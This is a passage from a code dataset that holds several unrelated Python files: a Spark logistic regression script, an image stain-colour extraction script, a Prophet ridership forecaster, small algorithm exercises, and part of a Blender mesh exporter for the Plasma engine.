model.transform(test_vectors).select(test_vectors.columns[0],'pca')\n\n#transform result to rdd.\nrdd_train = pca_result.rdd\nrdd_test = pca_testresult.rdd\n\n# function to convert rdd to labelled point to fit the required format for logistic regression with LBFGS.\ndef convert(y):\n d = [x for x in y]\n return LabeledPoint(d[0],d[1:])\n\n# apply convert function to all features stored in rdd by using lambda function. \nparsed_traindata = rdd_train.map(lambda x:convert(x))\n\nparsed_testdata = rdd_test.map(lambda x:convert(x))\n\n\nprint(parsed_traindata.take(2))\n#pca_result.show(2)\n#pca_testresult.show(2)\n\nclassifier = LogisticRegressionWithLBFGS()\n\nmodel1 = classifier.train(parsed_traindata,numClasses=10)\n\n# Using lambda function to make prediction. \nprediciton = parsed_testdata.map(lambda p:(float(model1.predict(p.features)),p.label))\n\nend = time.time()\ntime = end-start\nprint(\"Execution time = %s\" % time)\np=prediciton.take(20)\nprint(p)\n\n# Using lambda function to calculate accurancy. \n\naccuracy = prediciton.filter(lambda lp:lp[0] ==lp[1]).count() /float(parsed_testdata.count())\n\nmetrics = MulticlassMetrics(prediciton)\n\n# performance metrics calculation.\nconfusion_matrix= metrics.confusionMatrix()\nprecision = metrics.precision()\nrecall = metrics.recall()\nf1 = metrics.fMeasure()\n\nprint(\"Execution time = %s\" %time)\nprint(\"Accuray = %s\" % accuracy)\nprint(\"Overall Precision = %s\" % precision)\nprint(\"Overall Recall = %s\" %recall)\nprint(\"F1 = %s\" %f1)\n\nprint(confusion_matrix)\n\nlabels = parsed_traindata.map(lambda lp: lp.label).distinct().collect()\nfor label in sorted(labels):\n print(\"Class %s precision = %s\" % (label, metrics.precision(label)))\n print(\"Class %s recall = %s\" % (label, metrics.recall(label)))\n print(\"Class %s F1 Measure = %s\" % (label, metrics.fMeasure(label, beta=1.0)))\n\n\nprint(\"Weighted recall = %s\" % metrics.weightedRecall)\nprint(\"Weighted precision = %s\" % metrics.weightedPrecision)\nprint(\"Weighted F(1) Score = %s\" % metrics.weightedFMeasure())\nprint(\"Weighted F(0.5) Score = %s\" % metrics.weightedFMeasure(beta=0.5))\nprint(\"Weighted false positive rate = %s\" % metrics.weightedFalsePositiveRate)\n\nprediciton.saveAsTextFile(\"/Users/alfred/PycharmProjects/demo/t28\")\n","sub_path":"logistic regression.py","file_name":"logistic regression.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"68953446","text":"import cv2\r\nimport numpy as np\r\nimport os\r\nimport colorsys\r\nimport copy\r\ndef disRGBimg(img,c2):\r\n img=img[::-1,:,:].astype(np.float32)\r\n for i in range(3):\r\n img[i,:,:]=(img[i,:,:]-c2[i])*(img[i,:,:]-c2[i])\r\n #print('np.max(img),np.min(img)',np.max(img),np.min(img))\r\n return (255-np.sqrt(np.sum(img,axis=0)/(3*255*255))*255).astype('uint8')\r\ndef dis_stack_img(img,c2):\r\n #img=img[::-1,:,:].astype(np.float32)\r\n for i in range(6):\r\n img[i,:,:]=(img[i,:,:]-c2[i])*(img[i,:,:]-c2[i])\r\n #print('np.max(img),np.min(img)',np.max(img),np.min(img))\r\n return (255-np.sqrt(np.sum(img,axis=0)/(3*255*255))*255).astype('uint8')\r\n \r\ndef pencentile_and_pool(i, dis, percent,prefix,save_visual,naip_slice,patch_file,fore_ground,back_ground):\r\n visual_folder='/mnt/blobfuse/train-output/ByMZ/high_res_20back'\r\n color_iter_distance=[59.38414365, 47.0623548, 68.98451365, 61.70322829, 47.0623548 ]\r\n if not os.path.exists(visual_folder):\r\n os.makedirs(visual_folder)\r\n p=np.percentile(dis,percent)\r\n if prefix=='background':\r\n p=np.max((p,255-30))\r\n else:\r\n p=np.max((p,255-color_iter_distance[int(i/2)])) #35=np.sqrt(20^2+20^2+20^2)\r\n print('i',i,'p',p)\r\n s,dis_bi=cv2.threshold(dis,p,255,cv2.THRESH_BINARY)\r\n kernel=np.ones((3,3))\r\n dis_ero=cv2.dilate(dis_bi,kernel,iterations=1)\r\n if prefix=='background':\r\n dis_ero=cv2.erode(dis_ero,kernel,iterations=9)\r\n else:\r\n dis_ero=cv2.erode(dis_ero,kernel,iterations=2)\r\n dis_ero=(dis_ero>0).astype('uint8')\r\n \r\n \r\n pooled=self.maxpool(dis_ero,self.unet_level)\r\n pooled=pooled+back_ground\r\n pooled_bi=(pooled>0).astype('uint8')\r\n pooled_bi=pooled_bi-fore_ground\r\n pooled_bi=(pooled_bi>0).astype('uint8')\r\n \r\n \r\n pooled_bi_expand=self.expand_output_mao(pooled_bi*255,self.unet_level)\r\n naip_slice1=np.swapaxes(naip_slice,0,2)\r\n naip_slice1=np.swapaxes(naip_slice1,0,1)\r\n \r\n if self.save_visual==1:\r\n cv2.imwrite(os.path.join(visual_folder,os.path.basename(patch_file)+prefix+'_'+'dis_bi'+str(int(i/2))+'.png'),dis_bi)\r\n cv2.imwrite(os.path.join(visual_folder,os.path.basename(patch_file)+prefix+'_'+'dis_ero'+str(int(i/2))+'.png'),dis_ero*255)\r\n cv2.imwrite(os.path.join(visual_folder,os.path.basename(patch_file)+prefix+'_'+'pooled_bi'+str(int(i/2))+'.png'),pooled_bi_expand)\r\n\r\n if not os.path.exists(os.path.join(visual_folder,os.path.basename(patch_file)+prefix+'_'+'ori.png')):\r\n cv2.imwrite(os.path.join(visual_folder,os.path.basename(patch_file)+prefix+'_'+'ori.png'),(naip_slice1*255).astype('uint8'))\r\n return pooled_bi\r\n \r\n#####color extraction\r\nstain_OD=np.array([[82.60197,90.8649,98.27977],[14.87054,138.48598,65.88664],[ 17.725187,24.566036,76.55223],[116.36674,16.986359, 12.227117],[35.247486,82.52399,34.31515]])\r\nstain_RGB=np.exp(-stain_OD*np.log(255)/255)*255-1\r\nIHC_OD=np.array([26.784452,20.88244,14.707071])\r\nIHC_RGB=np.exp(-IHC_OD*np.log(255)/255)*255-1\r\n\r\n\r\nsave_folder='./color_L2/'\r\nif not os.path.exists(save_folder):\r\n os.makedirs(save_folder)\r\ncolor_name=['CD16 dark brown','CD20 pink','CD3 yellow', 'CD4 cyan','CD8 purple']\r\ninputfolder='./test_color_L2/'\r\nimname='1475_1.0_0.0_0.0_1.0_1.0_0.0_1.0_0.0_1.0_0.0.npyforeground_ori.png'\r\n#\r\n\r\nfor i in range(5):\r\n \r\n \r\n #print('img.shape',img.shape)\r\n #print('stain_RGB[i/2,:]',stain_RGB[int(i/2),:])\r\n img=cv2.imread(os.path.join(inputfolder,imname))\r\n #img=np.transpose(img)\r\n #\r\n print(img.shape)\r\n #dis=colorsys.rgb_to_hsv(img[2,:,:]/255.0,img[1,:,:]/255.0,img[0,:,:]/255.0)\r\n img[0,0,2]=stain_RGB[i,0]\r\n img[0,0,1]=stain_RGB[i,1]\r\n img[0,0,0]=stain_RGB[i,2]\r\n dis = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n dis=np.transpose(dis)\r\n hsv=copy.deepcopy(dis)\r\n dis=disRGBimg(dis,[dis[2,0,0],dis[1,0,0],dis[0,0,0]])\r\n dis=np.transpose(dis)\r\n \r\n img=np.transpose(img)\r\n rgb=copy.deepcopy(img)\r\n disrgb=disRGBimg(img,stain_RGB[i])\r\n disrgb=np.transpose(disrgb)\r\n \r\n #dis_IHC=disRGBimg(img,IHC_RGB)\r\n \r\n stack=np.zeros((6,rgb.shape[1],rgb.shape[2]))\r\n stack[0:3,:,:]=rgb[::-1,:,:]\r\n stack[3:6,:,:]=hsv[::-1,:,:]\r\n color_stack=np.zeros((6))\r\n color_stack[0:3]=stain_RGB[i]\r\n color_stack[3:6]=np.array([hsv[2,0,0],hsv[1,0,0],hsv[0,0,0]])\r\n dis_stack=dis_stack_img(stack,color_stack)\r\n dis_stack=np.transpose(dis_stack)\r\n print(np.max(dis),np.min(dis))\r\n cv2.imwrite(os.path.join(save_folder,imname[0:-4]+color_name[i]+'_hsv.png'),dis.astype('uint8'))\r\n cv2.imwrite(os.path.join(save_folder,imname[0:-4]+color_name[i]+'_rgb.png'),disrgb.astype('uint8'))\r\n cv2.imwrite(os.path.join(save_folder,imname[0:-4]+color_name[i]+'_stack.png'),dis_stack.astype('uint8'))\r\n ","sub_path":"training_phase/color_conversion_deconve_L2dis/color_extraction_for_labeling.py","file_name":"color_extraction_for_labeling.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"26698815","text":"from datetime import datetime\nfrom fbprophet import Prophet\nimport pandas as pd\nfrom util import Util\n\nclass RidershipModel:\n\n def __init__(self,field):\n # self._training_data = training_data\n self.init_holidays()\n self._model = Prophet(daily_seasonality=True, weekly_seasonality=True, holidays=self._holidays)\n self._model.add_country_holidays(country_name=\"PH\")\n self._field = field\n\n\n def init_holidays(self):\n dates = []\n start = datetime(2019,4,15,0,0)\n end = datetime(2019,4,22,0,0)\n date = start\n while date < end:\n dates.append(date)\n date = Util.get_next_hour(date,1)\n self._holidays = pd.DataFrame({\n 'holiday': 'holy week',\n 'ds': pd.to_datetime(dates),\n 'lower_window': 0,\n 'upper_window': 0\n })\n\n def add_holidays(self,holidays):\n if 'ds' not in holidays.columns:\n holidays['ds'] = ds.index\n self._holidays.append(holidays)\n\n def fit(self,data):\n self._model.fit(self.prep_data(data))\n\n\n def prep_data(self,data,training=True):\n new_df = data.copy()\n if 'ds' not in new_df.columns:\n new_df['ds'] = data.index\n if training:\n new_df['y'] = data[self._field]\n return new_df\n\n\n def predict_indiv(self,date):\n predict_df = pd.DataFrame(data=[date], cols=[\"ds\"])\n return self.prep_predict(self._model.predict(predict_df))\n\n def predict(self,df):\n return self.prep_predict(self._model.predict(self.prep_data(df,False)))\n\n def predict_steps(self,steps):\n predict_df = self._model.make_future_dataframe(periods=steps,freq='h',include_history=False)\n return self.prep_predict(self._model.predict(predict_df))\n\n\n def prep_predict(self, prediction):\n pred_df = prediction.merge(self._holidays, left_on='ds', right_on='ds', how='left').fillna(0)\n pred_df.loc[pred_df['holiday'] != 0, 'prediction'] = 0\n pred_df.loc[pred_df['holiday'] == 0, 'prediction'] = pred_df[pred_df['holiday'] == 0]['yhat']\n return pred_df\n","sub_path":"ml_model/ridership_model.py","file_name":"ridership_model.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"642025375","text":"## A program that determinnes if a string is a palindrome ##\n\n# Prompting input from the user, converting string to lowercase characters, and\n# determining the word length\nentry = input(\"Enter a word: \")\nword = entry.lower()\nword_length = len(word)\n# Checking if a word has an even or odd number of letters and determining half\n# the number of letters in half of the word (either side of middle letter for\n# on odd number word)\n\nif word_length % 2 == 0: # Even\n half_word = int(word_length / 2)\nelse: # odd\n half_word = int((word_length - 1) / 2)\n\n# Initializing palindrome to True\npalindrome = True\n\n# Comparing each letter working from the outside in. If the conditions for a\n# palindrome are met, a holder variable (x) is set to 1. Else, var palindrome\n# is set to False.\nfor i in range(0, half_word):\n if word[i] == word[len(word)-(i+1)]:\n x = 1\n else:\n palindrome = False\n\n# Displaying output\nif palindrome:\n print(\"\\\"%s\\\" is a palindrome\" % entry)\nelse:\n print(\"\\\"%s\\\" is not a palindrome\" % entry)\n","sub_path":"3 Loop exercises/Ex_72.py","file_name":"Ex_72.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"453836582","text":"\"\"\"\n区间和\n假定有一个无限长的数轴,数轴上每个坐标上的数都是0。\n\n现在,我们首先进行 n 次操作,每次操作将某一位置x上的数加c。\n\n接下来,进行 m 次询问,每个询问包含两个整数l和r,你需要求出在区间[l, r]之间的所有数的和。\n\n输入格式\n第一行包含两个整数n和m。\n\n接下来 n 行,每行包含两个整数x和c。\n\n再接下里 m 行,每行包含两个整数l和r。\n\n输出格式\n共m行,每行输出一个询问中所求的区间内数字和。\n\n数据范围\n−10^9 ≤ x ≤ 10^9,\n1 ≤ n,m ≤ 10^5,\n−10^9 ≤ l ≤ r ≤ 10^9,\n−10000 ≤ c ≤ 10000\n输入样例:\n3 3\n1 2\n3 6\n7 5\n1 3\n4 6\n7 8\n输出样例:\n8\n0\n5\n\n1. 将所有的坐标映射到,离散化之后的数组上\n\"\"\"\nn, m = map(int, input().split())\nN = 100000 # n 和 m 的取值范围\nadd = [] # 存储插入操作的二元组\nquery = [] # 存储查询操作的二元组\nalls = [] # 存储插入和查询的所有坐标,并完成 alls[index] = x 的映射\nA = [0] * (N * 3 + 10) # alls最大可以存储了 n + 2 * m个坐标\nS = [0] * (N * 3 + 10) # 前缀和数组的大小也要随A适应\n\n\n# 二分查找\ndef find(x):\n l = 0\n r = len(alls) - 1\n while l < r:\n mid = l + r + 1 >> 1\n if alls[mid] >= x:\n r = mid - 1\n else:\n l = mid\n return l + 1 # 因为要计算前缀和,所以加1保证索引从1开始 => B[1] = B[0] + A[1]\n\n\nif __name__ == '__main__':\n for i in range(n):\n x, c = map(int, input().split())\n add.append((x, c))\n alls.append(x)\n\n for j in range(m):\n l, r = map(int, input().split())\n query.append((l, r))\n alls.append(l)\n alls.append(r)\n\n # 1. 进行映射 - 将all数组去重后排序\n alls = list(sorted(set(alls)))\n\n # 2. 插入数据\n for x, c in add:\n index = find(x)\n A[index] += c\n\n # 3. 计算前缀和\n for i in range(1, len(alls) + 1):\n S[i] = S[i - 1] + A[i]\n\n # 4. 输出结果 l ~ r 的前缀和 => S[index_l] - S[index_r - 1]\n for l, r in query:\n print(S[find(r)] - S[find(l) - 1])","sub_path":"2021/Algorithm/Python/Base/1_basic_algorithm/802.py","file_name":"802.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"71704333","text":"# This file is part of Korman.\n#\n# Korman is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Korman is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Korman. If not, see .\n\nimport bpy\nfrom PyHSPlasma import *\nfrom math import fabs\nimport weakref\n\nfrom ..exporter.logger import ExportProgressLogger\nfrom . import explosions\nfrom .. import helpers\nfrom . import material\nfrom . import utils\n\n_MAX_VERTS_PER_SPAN = 0xFFFF\n_WARN_VERTS_PER_SPAN = 0x8000\n\n_VERTEX_COLOR_LAYERS = {\"col\", \"color\", \"colour\"}\n\nclass _RenderLevel:\n MAJOR_OPAQUE = 0\n MAJOR_FRAMEBUF = 1\n MAJOR_DEFAULT = 2\n MAJOR_BLEND = 4\n MAJOR_LATE = 8\n\n _MAJOR_SHIFT = 28\n _MINOR_MASK = ((1 << _MAJOR_SHIFT) - 1)\n\n def __init__(self, bo, hsgmat, pass_index, blendSpan=False):\n self.level = 0\n\n if blendSpan:\n self.major = self.MAJOR_DEFAULT\n\n # We use the blender material's pass index (which we stashed in the hsGMaterial) to increment\n # the render pass, just like it says...\n self.level += pass_index\n\n def __eq__(self, other):\n return self.level == other.level\n\n def __hash__(self):\n return hash(self.level)\n\n def _get_major(self):\n return self.level >> self._MAJOR_SHIFT\n def _set_major(self, value):\n self.level = ((value << self._MAJOR_SHIFT) & 0xFFFFFFFF) | self.minor\n major = property(_get_major, _set_major)\n\n def _get_minor(self):\n return self.level & self._MINOR_MASK\n def _set_minor(self, value):\n self.level = ((self.major << self._MAJOR_SHIFT) & 0xFFFFFFFF) | value\n minor = property(_get_minor, _set_minor)\n\n\nclass _DrawableCriteria:\n def __init__(self, bo, hsgmat, pass_index):\n self.blend_span = bool(hsgmat.layers[0].object.state.blendFlags & hsGMatState.kBlendMask)\n self.criteria = 0\n\n if self.blend_span:\n for mod in bo.plasma_modifiers.modifiers:\n if mod.requires_face_sort:\n self.criteria |= plDrawable.kCritSortFaces\n if mod.requires_span_sort:\n self.criteria |= plDrawable.kCritSortSpans\n self.render_level = _RenderLevel(bo, hsgmat, pass_index, self.blend_span)\n\n def __eq__(self, other):\n if not isinstance(other, _DrawableCriteria):\n return False\n for i in (\"blend_span\", \"render_level\", \"criteria\"):\n if getattr(self, i) != getattr(other, i):\n return False\n return True\n\n def __hash__(self):\n return hash(self.render_level) ^ hash(self.blend_span) ^ hash(self.criteria)\n\n @property\n def span_type(self):\n if self.blend_span:\n return \"BlendSpans\"\n else:\n return \"Spans\"\n\n\nclass _GeoData:\n def __init__(self, numVtxs):\n self.blender2gs = [{} for i in range(numVtxs)]\n self.triangles = []\n self.vertices = []\n\n\n\nclass _MeshManager:\n def __init__(self, report=None):\n if report is not None:\n self._report = report\n self._overrides = {}\n\n @staticmethod\n def add_progress_presteps(report):\n report.progress_add_step(\"Applying Blender Mods\")\n\n def _build_prop_dict(self, bstruct):\n props = {}\n for i in bstruct.bl_rna.properties:\n ident = i.identifier\n if ident == \"rna_type\":\n continue\n props[ident] = getattr(bstruct, ident) if getattr(i, \"array_length\", 0) == 0 else tuple(getattr(bstruct, ident))\n return props\n\n def __enter__(self):\n scene = bpy.context.scene\n self._report.progress_advance()\n self._report.progress_range = len(scene.objects)\n\n # Some modifiers like \"Array\" will procedurally generate new geometry that will impact\n # lightmap generation. The Blender Internal renderer does not seem to be smart enough to\n # take this into account. Thus, we temporarily apply modifiers to ALL meshes (even ones that\n # are not exported) such that we can generate proper lighting.\n mesh_type = bpy.types.Mesh\n for i in scene.objects:\n if isinstance(i.data, mesh_type) and i.is_modified(scene, \"RENDER\"):\n # Remember, storing actual pointers to the Blender objects can cause bad things to\n # happen because Blender's memory management SUCKS!\n self._overrides[i.name] = { \"mesh\": i.data.name, \"modifiers\": [] }\n i.data = i.to_mesh(scene, True, \"RENDER\", calc_tessface=False)\n\n # If the modifiers are left on the object, the lightmap bake can break under some\n # situations. Therefore, we now cache the modifiers and clear them away...\n if i.plasma_object.enabled:\n cache_mods = self._overrides[i.name][\"modifiers\"]\n for mod in i.modifiers:\n cache_mods.append(self._build_prop_dict(mod))\n i.modifiers.clear()\n self._report.progress_increment()\n return self\n\n def __exit__(self, type, value, traceback):\n data_bos, data_meshes = bpy.data.objects, bpy.data.meshes\n for obj_name, override in self._overrides.items():\n bo = data_bos.get(obj_name)\n\n # Reapply the old mesh\n trash_mesh, bo.data = bo.data, data_meshes.get(override[\"mesh\"])\n data_meshes.remove(trash_mesh)\n\n # If modifiers were removed, reapply them now.\n for cached_mod in override[\"modifiers\"]:\n mod = bo.modifiers.new(cached_mod[\"name\"], cached_mod[\"type\"])\n for key, value in cached_mod.items():\n if key in {\"name\", \"type\"}:\n continue\n setattr(mod, key, value)\n\n\nclass MeshConverter(_MeshManager):\n def __init__(self, exporter):\n self._exporter = weakref.ref(exporter)\n self.material = material.MaterialConverter(exporter)\n\n self._dspans = {}\n self._mesh_geospans = {}\n\n # _report is a property on this subclass\n super().__init__()\n\n def _calc_num_uvchans(self, bo, mesh):\n max_user_texs = plGeometrySpan.kUVCountMask\n num_user_texs = len(mesh.tessface_uv_textures)\n total_texs = num_user_texs\n\n # Bump Mapping requires 2 magic channels\n if self.material.get_bump_layer(bo) is not None:\n total_texs += 2\n max_user_texs -= 2\n\n # Lightmapping requires its own LIGHTMAPGEN channel\n # NOTE: the LIGHTMAPGEN texture has already been created, so it is in num_user_texs\n lm = bo.plasma_modifiers.lightmap\n if lm.enabled and lm.bake_type == \"lightmap\":\n num_user_texs -= 1\n max_user_texs -= 1\n\n return (num_user_texs, total_texs, max_user_texs)\n\n def _create_geospan(self, bo, mesh, bm, hsgmatKey):\n \"\"\"Initializes a plGeometrySpan from a Blender Object and an hsGMaterial\"\"\"\n geospan = plGeometrySpan()\n geospan.material = hsgmatKey\n\n # GeometrySpan format\n # For now, we really only care about the number of UVW Channels\n user_uvws, total_uvws, max_user_uvws = self._calc_num_uvchans(bo, mesh)\n if total_uvws > plGeometrySpan.kUVCountMask:\n raise explosions.TooManyUVChannelsError(bo, bm, user_uvws, max_user_uvws)\n geospan.format = total_uvws\n\n # Begin total guesswork WRT flags\n mods = bo.plasma_modifiers\n if mods.lightmap.enabled:\n geospan.props |= plGeometrySpan.kLiteVtxNonPreshaded\n if mods.lighting.rt_lights:\n geospan.props |= plGeometrySpan.kPropRunTimeLight\n\n # Harvest lights\n permaLights, permaProjs = self._exporter().light.find_material_light_keys(bo, bm)\n for i in permaLights:\n geospan.addPermaLight(i)\n for i in permaProjs:\n geospan.addPermaProj(i)\n\n # If this object has a CI, we don't need xforms here...\n if self._exporter().has_coordiface(bo):\n geospan.localToWorld = hsMatrix44()\n geospan.worldToLocal = hsMatrix44()\n else:\n geospan.localToWorld = utils.matrix44(bo.matrix_basis)\n geospan.worldToLocal = geospan.localToWorld.inverse()\n return geospan\n\n def finalize(self):\n \"\"\"Prepares all baked Plasma geometry to be flushed to the disk\"\"\"\n self._report.progress_advance()\n self._report.progress_range = len(self._dspans)\n inc_progress = self._report.progress_increment\n log_msg = self._report.msg\n\n log_msg(\"\\nFinalizing Geometry\")\n for loc in self._dspans.values():\n for dspan in loc.values():\n log_msg(\"[DrawableSpans '{}']\", dspan.key.name, indent=1)\n\n # This mega-function does a lot:\n # 1. Converts SourceSpans (geospans) to Icicles and bakes geometry into plGBuffers\n # 2. Calculates the Icicle bounds\n # 3. Builds the plSpaceTree\n # 4. Clears the SourceSpans\n dspan.composeGeometry(True, True)\n inc_progress()\n\n def _export_geometry(self, bo, mesh, materials, geospans):\n geodata = [_GeoData(len(mesh.vertices)) for i in materials]\n bumpmap = self.material.get_bump_layer(bo)\n\n # Locate relevant vertex color layers now...\n lm = bo.plasma_modifiers.lightmap\n color, alpha = None, None\n for vcol_layer in mesh.tessface_vertex_colors:\n name = vcol_layer.name.lower()\n if name in _VERTEX_COLOR_LAYERS:\n color = vcol_layer.data\n elif name == \"autocolor\" and color is None and not lm.bake_lightmap:\n color = vcol_layer.data\n elif name == \"alpha\":\n alpha = vcol_layer.data\n\n # Convert Blender faces into things we can stuff into libHSPlasma\n for i, tessface in enumerate(mesh.tessfaces):\n data = geodata[tessface.material_index]\n face_verts = []\n use_smooth = tessface.use_smooth\n dPosDu = hsVector3(0.0, 0.0, 0.0)\n dPosDv = hsVector3(0.0, 0.0, 0.0)\n\n # Unpack the UV coordinates from each UV Texture layer\n # NOTE: Blender has no third (W) coordinate\n tessface_uvws = [uvtex.data[i].uv for uvtex in mesh.tessface_uv_textures]\n\n # Unpack colors\n if color is None:\n tessface_colors = ((1.0, 1.0, 1.0), (1.0, 1.0, 1.0), (1.0, 1.0, 1.0), (1.0, 1.0, 1.0))\n else:\n src = color[i]\n tessface_colors = (src.color1, src.color2, src.color3, src.color4)\n\n # Unpack alpha values\n if alpha is None:\n tessface_alphas = (1.0, 1.0, 1.0, 1.0)\n else:\n src = alpha[i]\n # average color becomes the alpha value\n tessface_alphas = (((src.color1[0] + src.color1[1] + src.color1[2]) / 3),\n ((src.color2[0] + src.color2[1] + src.color2[2]) / 3),\n ((src.color3[0] + src.color3[1] + src.color3[2]) / 3),\n ((src.color4[0] + src.color4[1] + src.color4[2]) / 3))\n\n if bumpmap is not None:\n gradPass = []\n gradUVWs = []\n\n if len(tessface.vertices) != 3:\n gradPass.append([tessface.vertices[0], tessface.vertices[1], tessface.vertices[2]])\n gradPass.append([tessface.vertices[0], tessface.vertices[2], tessface.vertices[3]])\n gradUVWs.append((tuple((uvw[0] for uvw in tessface_uvws)),\n tuple((uvw[1] for uvw in tessface_uvws)),\n tuple((uvw[2] for uvw in tessface_uvws))))\n gradUVWs.append((tuple((uvw[0] for uvw in tessface_uvws)),\n tuple((uvw[2] for uvw in tessface_uvws)),\n tuple((uvw[3] for uvw in tessface_uvws))))\n else:\n gradPass.append(tessface.vertices)\n gradUVWs.append((tuple((uvw[0] for uvw in tessface_uvws)),\n tuple((uvw[1] for uvw in tessface_uvws)),\n tuple((uvw[2] for uvw in tessface_uvws))))\n\n for p, vids in enumerate(gradPass):\n dPosDu += self._get_bump_gradient(bumpmap[1], gradUVWs[p], mesh, vids, bumpmap[0], 0)\n dPosDv += self._get_bump_gradient(bumpmap[1], gradUVWs[p], mesh, vids, bumpmap[0], 1)\n dPosDv = -dPosDv\n\n # Convert to per-material indices\n for j, vertex in enumerate(tessface.vertices):\n uvws = tuple([uvw[j] for uvw in tessface_uvws])\n\n # Grab VCols\n vertex_color = (int(tessface_colors[j][0] * 255), int(tessface_colors[j][1] * 255),\n int(tessface_colors[j][2] * 255), int(tessface_alphas[j] * 255))\n\n # Now, we'll index into the vertex dict using the per-face elements :(\n # We're using tuples because lists are not hashable. The many mathutils and PyHSPlasma\n # types are not either, and it's entirely too much work to fool with all that.\n coluv = (vertex_color, uvws)\n if coluv not in data.blender2gs[vertex]:\n source = mesh.vertices[vertex]\n geoVertex = plGeometrySpan.TempVertex()\n geoVertex.position = hsVector3(*source.co)\n\n # If this face has smoothing, use the vertex normal\n # Otherwise, use the face normal\n if use_smooth:\n geoVertex.normal = hsVector3(*source.normal)\n else:\n geoVertex.normal = hsVector3(*tessface.normal)\n\n geoVertex.color = hsColor32(*vertex_color)\n uvs = [hsVector3(uv[0], 1.0 - uv[1], 0.0) for uv in uvws]\n if bumpmap is not None:\n uvs.append(dPosDu)\n uvs.append(dPosDv)\n geoVertex.uvs = uvs\n\n idx = len(data.vertices)\n data.blender2gs[vertex][coluv] = idx\n data.vertices.append(geoVertex)\n face_verts.append(idx)\n else:\n # If we have a bump mapping layer, then we need to add the bump gradients for\n # this face to the vertex's magic channels\n if bumpmap is not None:\n num_user_uvs = len(uvws)\n geoVertex = data.vertices[data.blender2gs[vertex][coluv]]\n\n # Unfortunately, PyHSPlasma returns a copy of everything. Previously, editing\n # in place would result in silent failures; however, as of python_refactor,\n # PyHSPlasma now returns tuples to indicate this.\n geoUVs = list(geoVertex.uvs)\n geoUVs[num_user_uvs] += dPosDu\n geoUVs[num_user_uvs+1] += dPosDv\n geoVertex.uvs = geoUVs\n face_verts.append(data.blender2gs[vertex][coluv])\n\n # Convert to triangles, if need be...\n if len(face_verts) == 3:\n data.triangles += face_verts\n elif len(face_verts) == 4:\n data.triangles += (face_verts[0], face_verts[1], face_verts[2])\n data.triangles += (face_verts[0], face_verts[2], face_verts[3])\n\n # Time to finish it up...\n for i, data in enumerate(geodata):\n geospan = geospans[i][0]\n numVerts = len(data.vertices)\n numUVs = geospan.format & plGeometrySpan.kUVCountMask\n\n # There is a soft limit of 0x8000 vertices per span in Plasma, but the limit is\n # theoretically 0xFFFF because this field is a 16-bit integer. However, bad things\n # happen in MOUL when we have over 0x8000 vertices. I've also received tons of reports\n # of stack dumps in PotS when modifiers are applied, so we're going to limit to 0x8000.\n # TODO: consider busting up the mesh into multiple geospans?\n # or hack plDrawableSpans::composeGeometry to do it for us?\n if numVerts > _WARN_VERTS_PER_SPAN:\n raise explosions.TooManyVerticesError(bo.data.name, geospan.material.name, numVerts)\n\n # If we're bump mapping, we need to normalize our magic UVW channels\n if bumpmap is not None:\n for vtx in data.vertices:\n uvMap = vtx.uvs\n uvMap[numUVs - 2].normalize()\n uvMap[numUVs - 1].normalize()\n vtx.uvs = uvMap\n\n # If we're still here, let's add our data to the GeometrySpan\n geospan.indices = data.triangles\n geospan.vertices = data.vertices\n\n\n def _get_bump_gradient(self, xform, uvws, mesh, vIds, uvIdx, iUV):\n v0 = hsVector3(*mesh.vertices[vIds[0]].co)\n v1 = hsVector3(*mesh.vertices[vIds[1]].co)\n v2 = hsVector3(*mesh.vertices[vIds[2]].co)\n\n uv0 = (uvws[0][uvIdx][0], uvws[0][uvIdx][1], 0.0)\n uv1 = (uvws[1][uvIdx][0], uvws[1][uvIdx][1], 0.0)\n uv2 = (uvws[2][uvIdx][0], uvws[2][uvIdx][1], 0.0)\n\n notUV = int(not iUV)\n _REAL_SMALL = 0.000001\n\n delta = uv0[notUV] - uv1[notUV]\n if fabs(delta) < _REAL_SMALL:\n return v1 - v0 if uv0[iUV] - uv1[iUV] < 0 else v0 - v1\n\n delta = uv2[notUV] - uv1[notUV]\n if fabs(delta) < _REAL_SMALL:\n return v1 - v2 if uv2[iUV] - uv1[iUV] < 0 else v2 - v1\n\n delta = uv2[notUV] - uv0[notUV]\n if fabs(delta) < _REAL_SMALL:\n return v0 - v2 if uv2[iUV] - uv0[iUV] < 0 else v2 - v0\n\n # On to the real fun...\n delta = uv0[notUV] - uv1[notUV]\n delta = 1.0 / delta\n v0Mv1 = v0 - v1\n v0Mv1 *= delta\n v0uv = (uv0[iUV] - uv1[iUV]) * delta\n\n delta = uv2[notUV] - uv1[notUV]\n delta = 1.0 / delta\n v2Mv1 = v2 - v1\n v2Mv1 *= delta\n v2uv = (uv2[iUV] - uv1[iUV]) * delta\n\n return v0Mv1 - v2Mv1 if v0uv > v2uv else v2Mv1 - v0Mv1\n\n def export_object(self, bo):\n # If this object has modifiers, then it's a unique mesh, and we don't need to try caching it\n # Otherwise, let's *try* to share meshes as best we can...\n if bo.modifiers:\n drawables = self._export_mesh(bo)\n else:\n drawables = self._mesh_geospans.get(bo.data, None)\n if drawables is None:\n drawables = self._export_mesh(bo)\n\n # Create the DrawInterface\n if drawables:\n diface = self._mgr.find_create_object(plDrawInterface, bl=bo)\n for dspan_key, idx in drawables:\n diface.addDrawable(dspan_key, idx)\n\n def _export_mesh(self, bo):\n # Previously, this called bo.to_mesh to apply modifiers. However, due to limitations in the\n # lightmap generation, this is now done for all modified mesh objects before any Plasma data\n # is exported.\n mesh = bo.data\n mesh.calc_tessface()\n\n # 